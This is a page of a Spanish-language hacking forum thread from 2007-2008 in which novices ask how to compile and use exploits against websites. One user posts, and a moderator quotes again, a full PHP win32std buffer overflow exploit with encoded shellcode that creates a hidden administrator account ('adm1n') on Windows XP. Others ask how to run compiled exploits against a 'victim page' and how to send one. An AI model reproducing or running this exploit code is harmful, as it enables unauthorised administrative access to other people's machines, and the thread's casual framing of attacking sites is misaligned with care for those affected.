hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
25 de Julio de 2008, 02:10:24
Noticias: Te consideras bueno en C++?
Para ver este enlace Registrate o Inicia Sesion
Aquí

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Bugs y Exploits (Moderadores: CHR0N05, vengador de las sombras)
| | |-+  Compilación e interpretación de Exploits || Tutorial Securityfocus: Buscando inf
0 Usuarios y 2 Visitantes están viendo este tema. « anterior próximo »
Páginas: 1 2 3 4 5 6 [7] 8 Ir Abajo Imprimir
Autor Tema: Compilación e interpretación de Exploits || Tutorial Securityfocus: Buscando inf  (Leído 21146 veces)
Zuko0
NZ1
*
Desconectado Desconectado

Mensajes: 99


Poirot-h4ck ...


Ver Perfil
« Respuesta #90 : 14 de Diciembre de 2007, 09:09:13 »

Pues no me compila...



La extensión está correcta y todo correcto...

A mi me pasa exactamente lo mismo, es mas, ya postie un tema al respecto, salu2
En línea
kentshy
NZ2
**
Desconectado Desconectado

Mensajes: 120


Ver Perfil
« Respuesta #91 : 16 de Diciembre de 2007, 09:35:17 »

Hola yo scannee una pag  cn el SSS y me dio este exploit:

<?php

##########################################################
###----------------------------------------------------###
###--------PHP win32std Buffer Overflow Exploit--------###
###----------------------------------------------------###
###-Tested on:-PHP 5.2.3-------------------------------###
###------------Windows XP SP2 Eng----------------------###
###----------------------------------------------------###
###-Note:-Shellcode is hard coded for Win XP SP2 Eng---###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################



#Add user:    [user]=>"adm1n" [password]=>"netjackal"
$SC=
"\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86".
"\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8".
"\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63".
"\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31".
"\x6E\x20\x6E\x65\x74\x6A\x61\x63\x6B\x61\x6C\x20\x2F\x61".
"\x64\x64\x26\x26\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67".
"\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72".
"\x61\x74\x6F\x72\x73\x20\x2F\x61\x64\x64\x20\x61\x64\x6D".
"\x31\x6E\x58";

$RET="\x70\xE6\x16\x01";

$BOMB=str_repeat("\x90",24).$SC.str_repeat("A",121).$RET;

win_browse_fil e(1,NULL,$BOMB,NULL,array( "*" => "*.*"));
?>


Como lo compilo en php??
En línea
WaesWaes
Moderador Global
*****
Desconectado Desconectado

Mensajes: 1,346


Señor de Outland, de la sentencia del Templo Negro


Ver Perfil WWW
« Respuesta #92 : 16 de Diciembre de 2007, 10:12:11 »

Hola yo scannee una pag  cn el SSS y me dio este exploit:

<?php

##########################################################
###----------------------------------------------------###
###--------PHP win32std Buffer Overflow Exploit--------###
###----------------------------------------------------###
###-Tested on:-PHP 5.2.3-------------------------------###
###------------Windows XP SP2 Eng----------------------###
###----------------------------------------------------###
###-Note:-Shellcode is hard coded for Win XP SP2 Eng---###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################



#Add user:    [user]=>"adm1n" [password]=>"netjackal"
$SC=
"\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86".
"\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8".
"\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63".
"\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31".
"\x6E\x20\x6E\x65\x74\x6A\x61\x63\x6B\x61\x6C\x20\x2F\x61".
"\x64\x64\x26\x26\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67".
"\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72".
"\x61\x74\x6F\x72\x73\x20\x2F\x61\x64\x64\x20\x61\x64\x6D".
"\x31\x6E\x58";

$RET="\x70\xE6\x16\x01";

$BOMB=str_repeat("\x90",24).$SC.str_repeat("A",121).$RET;

win_browse_fil e(1,NULL,$BOMB,NULL,array( "*" => "*.*"));
?>


Como lo compilo en php??

:O por favor lee lo minimo antes de preguntar
En línea


Para ver este enlace Registrate o Inicia Sesion

Cita de: Mejor usuario de cph
1.WaesWaes, 2.Alfa, 3.TxShack
kentshy
NZ2
**
Desconectado Desconectado

Mensajes: 120


Ver Perfil
« Respuesta #93 : 17 de Diciembre de 2007, 03:34:22 »

Entonces eso para  q sirve es un exploit?
En línea
WaesWaes
Moderador Global
*****
Desconectado Desconectado

Mensajes: 1,346


Señor de Outland, de la sentencia del Templo Negro


Ver Perfil WWW
« Respuesta #94 : 17 de Diciembre de 2007, 03:39:25 »

del tipo Buffer Overflow
En línea


Para ver este enlace Registrate o Inicia Sesion

Cita de: Mejor usuario de cph
1.WaesWaes, 2.Alfa, 3.TxShack
N_e_O_n
Recien llegado
*
Desconectado Desconectado

Mensajes: 19



Ver Perfil
« Respuesta #95 : 22 de Diciembre de 2007, 10:53:08 »

tengo una pregunta... hice todos los pasos del SSS y de cuando quiero seguir los pasos de este, me fijo que no se en que lo tengo que compilar
este es el primer renglon
!/bin/bash

si me ayudan estare MUY agradecido JAJAJA
 toma-xD
En línea

NEON se undio en las profundidades de la tierra, pero ahora sale un predecesor, menos lammer =D
UNDER-ZERO
WaesWaes
Moderador Global
*****
Desconectado Desconectado

Mensajes: 1,346


Señor de Outland, de la sentencia del Templo Negro


Ver Perfil WWW
« Respuesta #96 : 22 de Diciembre de 2007, 11:03:40 »

leete todo esto

http://www.zonasiete.org/manual/ch07.html

hay que dedicarle un minimo a la programacion

salu2
En línea


Para ver este enlace Registrate o Inicia Sesion

Cita de: Mejor usuario de cph
1.WaesWaes, 2.Alfa, 3.TxShack
N_e_O_n
Recien llegado
*
Desconectado Desconectado

Mensajes: 19



Ver Perfil
« Respuesta #97 : 22 de Diciembre de 2007, 11:16:41 »

Gracias ya empece
 cool kool
En línea

NEON se undio en las profundidades de la tierra, pero ahora sale un predecesor, menos lammer =D
UNDER-ZERO
uriel_mec
NZ1
*
Desconectado Desconectado

Mensajes: 75



Ver Perfil
« Respuesta #98 : 05 de Enero de 2008, 04:54:16 »

yo tengo conocimientos en programacion en C, por lo tanto poseo un mismo compilador. Es el Turbo C++, me supongo que si compilo ahi mismo el codigo del Exploit debe funcionar igual no?, nadamas que tengo una duda, lei el manual acerca de como compilar en C, casi todo esta en el entorno de ms-dos, entonces si compilo el Exploit y lo guardo como ejecutable, cada que quiera usar yo el mismo exploit tendria que abrir el ejecutable para explotar las vulnerabilidad es de la pagina victima?
En línea

La ciencia es la progresiva aproximación del hombre al mundo real.
0zX
Colaborador
****
Desconectado Desconectado

Mensajes: 111


New-Bytes


Ver Perfil WWW
« Respuesta #99 : 07 de Enero de 2008, 05:35:54 »

10.000 Visitas Smiley  cool
En línea


Para ver este enlace Registrate o Inicia Sesion



Para ver este enlace Registrate o Inicia Sesion
WaesWaes
Moderador Global
*****
Desconectado Desconectado

Mensajes: 1,346


Señor de Outland, de la sentencia del Templo Negro


Ver Perfil WWW
« Respuesta #100 : 07 de Enero de 2008, 06:08:26 »

10.000 Visitas Smiley  cool

xDD que raro justo este tema xDD
En línea


Para ver este enlace Registrate o Inicia Sesion

Cita de: Mejor usuario de cph
1.WaesWaes, 2.Alfa, 3.TxShack
vampigab
Recien llegado
*
Desconectado Desconectado

Mensajes: 2


Ver Perfil
« Respuesta #101 : 10 de Enero de 2008, 10:29:05 »

HOLA ME TUVE QUE REGISTRAR PARA PARA QUITARME LA DUDA AUNQUE YO SE QUE DEBES ESTAR ARTO DE PERSONAS COMO YO PERO NO QUIERO QUEDARME CON LA DUDA YA LEI EL MANUAL COMO 5 VCES Y ME QUEDO PEGADO DONDE TODOS QUEDAN YA LO INSTALE DOS VECES YA METI TODOS LOS ARCHIVOS QUE ME FALTAVAN YO ESTOY SEGURO QUE LO ESTOY HACIENDO BIEN SERA LAS VULNERABILIDAD ES DE LA PAGINA QUE NO ESTOY TOMANDO LAS CORRECTAS PERO YA ME ASEGURE QUE SEAN C ALGUN CONSEJO DE CUAL LIBRERIA ESCOJER? :Smiley
En línea
Th666_HaCk
Visitante
« Respuesta #102 : 10 de Enero de 2008, 10:31:21 »

HOLA ME TUVE QUE REGISTRAR PARA PARA QUITARME LA DUDA AUNQUE YO SE QUE DEBES ESTAR ARTO DE PERSONAS COMO YO PERO NO QUIERO QUEDARME CON LA DUDA YA LEI EL MANUAL COMO 5 VCES Y ME QUEDO PEGADO DONDE TODOS QUEDAN YA LO INSTALE DOS VECES YA METI TODOS LOS ARCHIVOS QUE ME FALTAVAN YO ESTOY SEGURO QUE LO ESTOY HACIENDO BIEN SERA LAS VULNERABILIDAD ES DE LA PAGINA QUE NO ESTOY TOMANDO LAS CORRECTAS PERO YA ME ASEGURE QUE SEAN C ALGUN CONSEJO DE CUAL LIBRERIA ESCOJER? :Smiley

Favor de no escribir en mayuscula
En línea
vampigab
Recien llegado
*
Desconectado Desconectado

Mensajes: 2


Ver Perfil
« Respuesta #103 : 10 de Enero de 2008, 10:36:56 »

ups caps sry pero una es una forma de espresar frustracion  Wink
En línea
KillMan
Recien llegado
*
Desconectado Desconectado

Mensajes: 3


Ver Perfil
« Respuesta #104 : 18 de Enero de 2008, 05:57:57 »

Ya arregle el problema de la libreria...
Tongue
Exploit Compilado!

Ahora no se como enviarlo.

La dirección del exploit es: http://www.securityfocus.com/bid/8732/exploit

Para ver este enlace Registrate o Inicia Sesion
« Última modificación: 23 de Enero de 2008, 07:31:37 por KillMan » En línea
Páginas: 1 2 3 4 5 6 [7] 8 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online